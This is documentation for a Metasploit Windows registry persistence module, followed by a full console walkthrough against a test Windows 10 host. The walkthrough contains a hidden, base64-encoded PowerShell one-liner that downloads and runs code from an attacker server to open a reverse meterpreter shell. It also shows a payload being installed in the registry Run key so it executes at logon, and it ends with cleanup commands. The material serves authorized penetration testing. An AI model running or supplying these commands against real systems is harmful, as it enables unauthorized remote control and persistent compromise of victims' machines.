documentation/modules/exploit/windows/persistence/registry.md
This module will install a payload that is executed during boot. It will be executed either at user logon or system startup via the registry value in "CurrentVersion\Run" or "RunOnce" (depending on privilege and selected method). The payload will be installed completely in registry.
use exploit/windows/persistence/registryset session #runStartup type for the persistent payload. Options are USER and SYSTEM, defaults to USER.
The registry key to use for storing the payload blob. Default: random
The name to use for storing the payload blob. Default: random
The name to use for the Run key. Default: random
Amount of time to sleep (in seconds) before executing payload. Default: 0
Registry Key To Install To. Options are Run and RunOnce. Defaults to Run
Obtain original shell
resource (/root/.msf4/msfconsole.rc)> setg verbose true
verbose => true
resource (/root/.msf4/msfconsole.rc)> setg lhost 1.1.1.1
lhost => 1.1.1.1
resource (/root/.msf4/msfconsole.rc)> setg payload cmd/linux/http/x64/meterpreter/reverse_tcp
payload => cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> use exploit/multi/script/web_delivery
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set target 2
target => 2
resource (/root/.msf4/msfconsole.rc)> set srvport 8085
srvport => 8085
resource (/root/.msf4/msfconsole.rc)> set uripath w2
uripath => w2
resource (/root/.msf4/msfconsole.rc)> set payload payload/windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
resource (/root/.msf4/msfconsole.rc)> set lport 4449
lport => 4449
resource (/root/.msf4/msfconsole.rc)> run
[*] Exploit running as background job 0.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4449
[*] Using URL: http://1.1.1.1:8085/w2
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAA9AFsATgBlAHQALgBTAGUAYwB1AHIAaQB0AHkAUAByAG8AdABvAGMAbwBsAFQAeQBwAGUAXQA6ADoAVABsAHMAMQAyADsAJABwADAAMwB4AG4APQBuAGUAdwAtAG8AYgBqAGUAYwB0ACAAbgBlAHQALgB3AGUAYgBjAGwAaQBlAG4AdAA7AGkAZgAoAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAFAAcgBvAHgAeQBdADoAOgBHAGUAdABEAGUAZgBhAHUAbAB0AFAAcgBvAHgAeQAoACkALgBhAGQAZAByAGUAcwBzACAALQBuAGUAIAAkAG4AdQBsAGwAKQB7ACQAcAAwADMAeABuAC4AcAByAG8AeAB5AD0AWwBOAGUAdAAuAFcAZQBiAFIAZQBxAHUAZQBzAHQAXQA6ADoARwBlAHQAUwB5AHMAdABlAG0AVwBlAGIAUAByAG8AeAB5ACgAKQA7ACQAcAAwADMAeABuAC4AUAByAG8AeAB5AC4AQwByAGUAZABlAG4AdABpAGEAbABzAD0AWwBOAGUAdAAuAEMAcgBlAGQAZQBuAHQAaQBhAGwAQwBhAGMAaABlAF0AOgA6AEQAZQBmAGEAdQBsAHQAQwByAGUAZABlAG4AdABpAGEAbABzADsAfQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIALwBzAHUAWABJAE4AUgBnAGYAagBwAHUAbwAnACkAKQA7AEkARQBYACAAKAAoAG4AZQB3AC0AbwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADIALgAyADIAOAA6ADgAMAA4ADUALwB3ADIAJwApACkAOwA=
msf exploit(multi/script/web_delivery) >
[*] 2.2.2.2 web_delivery - Powershell command length: 3709
[*] 2.2.2.2 web_delivery - Delivering Payload (3709 bytes)
[*] Sending stage (230982 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (1.1.1.1:4449 -> 2.2.2.2:50218) at 2025-10-19 09:24:28 -0400
msf exploit(multi/script/web_delivery) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > sysinfo
Computer : WIN10PROLICENSE
OS : Windows 10 22H2+ (10.0 Build 19045).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 1...
Persistence
msf exploit(multi/script/web_delivery) > use exploit/windows/persistence/registry
[*] Using configured payload cmd/linux/http/x64/meterpreter/reverse_tcp
msf exploit(windows/persistence/registry) > set session 1
session => 1
msf exploit(windows/persistence/registry) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(windows/persistence/registry) > check
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Ws7IB4gE1WPHLZb
[+] The target is vulnerable. Registry writable
msf exploit(windows/persistence/registry) > exploit
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 1.1.1.1:4444
msf exploit(windows/persistence/registry) > [*] Running automatic check ("set AutoCheck false" to disable)
[+] Powershell detected on system
[*] Checking registry write access to: HKCU\Software\Microsoft\Windows\CurrentVersion\Run\KXBPUprYbD5frAT
[+] The target is vulnerable. Registry writable
[*] Generating payload blob..
[*] Powershell command length: 6885
[+] Generated payload, 6816 bytes
[*] Root path is HKCU
[*] Installing payload blob..
[+] Created registry key HKCU\Software\meCSomm1
[+] Installed payload blob to HKCU\Software\meCSomm1\haUGCPh4
[*] Installing run key
[+] Installed run key HKCU\Software\Microsoft\Windows\CurrentVersion\Run\O4aWIeM8
[*] Meterpreter-compatible Cleanup RC file: /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc
Logout user (killing original shell), and log back in
msf exploit(windows/persistence/registry) > [*] 2.2.2.2 - Meterpreter session 1 closed. Reason: Died
[*] Sending stage (188998 bytes) to 2.2.2.2
[*] Meterpreter session 2 opened (1.1.1.1:4444 -> 2.2.2.2:50225) at 2025-10-19 09:28:43 -0400
msf exploit(windows/persistence/registry) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > getuid
Server username: WIN10PROLICENSE\windows
meterpreter > background
[*] Backgrounding session 2...
Cleanup
msf exploit(windows/persistence/registry) > sessions -i 2
[*] Starting interaction with 2...
meterpreter > run /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc
[*] Processing /root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc for ERB directives.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deleteval -k 'HKCU\Software\meCSomm1' -v 'haUGCPh4'
Successfully deleted haUGCPh4.
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deletekey -k 'HKCU\Software\meCSomm1'
Successfully deleted key: HKCU\Software\meCSomm1
resource (/root/.msf4/logs/persistence/WIN10PROLICENSE_20251019.2744/WIN10PROLICENSE_20251019.2744.rc)> reg deleteval -k 'HKCU\Software\Microsoft\Windows\CurrentVersion\Run' -v 'O4aWIeM8'
Successfully deleted O4aWIeM8.
meterpreter >